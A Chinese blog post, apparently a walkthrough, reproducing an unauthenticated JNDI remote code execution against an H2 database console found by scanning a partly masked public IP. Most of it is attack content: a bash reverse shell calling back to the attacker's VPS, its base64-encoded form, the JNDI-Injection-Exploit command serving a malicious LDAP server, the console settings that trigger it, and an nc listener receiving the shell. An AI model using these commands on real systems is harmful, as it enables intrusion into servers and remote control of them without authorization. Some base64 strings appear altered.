h2 database console JNDI RCE复现(反弹shell)

扫描ip发现资产H2 database

http://150.xxx.xxx.xxx:20051

上网搜关键字发现该系统存在未授权RCE命令执行

1、构造payload:

用到网站:https://ares-x.com/tools/runtime-exec,在里面输入我们的反弹shell命令:bash -i >& /dev/tcp/vps服务器ip地址/5555 0>&1,他会自动生成base64加密的payload:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcCaaaaauNDEuNzcuMjA2LzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}

2、下载利用工具,这里我们用到工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

下载好之后在攻击机(公网服务器)执行:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTAuNDEuNzaaaaajA2LzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "vps服务器ip"

-C 执行命令,这里放入我们生成的payload:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcaaaaEuNzcuMjA2LzU1NTUgMD4mMQ==}|{base64,-d}

-A 攻击机ip:vps服务器ip

执行之后会出现下面好几种payload,经过测试标粉的可以成功执行

3、利用payload进行反弹

(1)、配置定义:

  • Setting Name: Generic JNDI Data Source (名称随意)
  • Driver Class: javax.naming.InitialContext (JDK自带也不用考虑额外的驱动)
  • JDBC URL: ldap://vps服务器ip:1389/f7p7w0 (恶意LDAP Server)
  • 由于是匿名的,User Name和Password均为空

(2)、监听我们反弹过来的端口:nc -lvvp 5555

(3)、执行测试连接

直接连接,然后会发现已经接收到反弹过来的shell了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值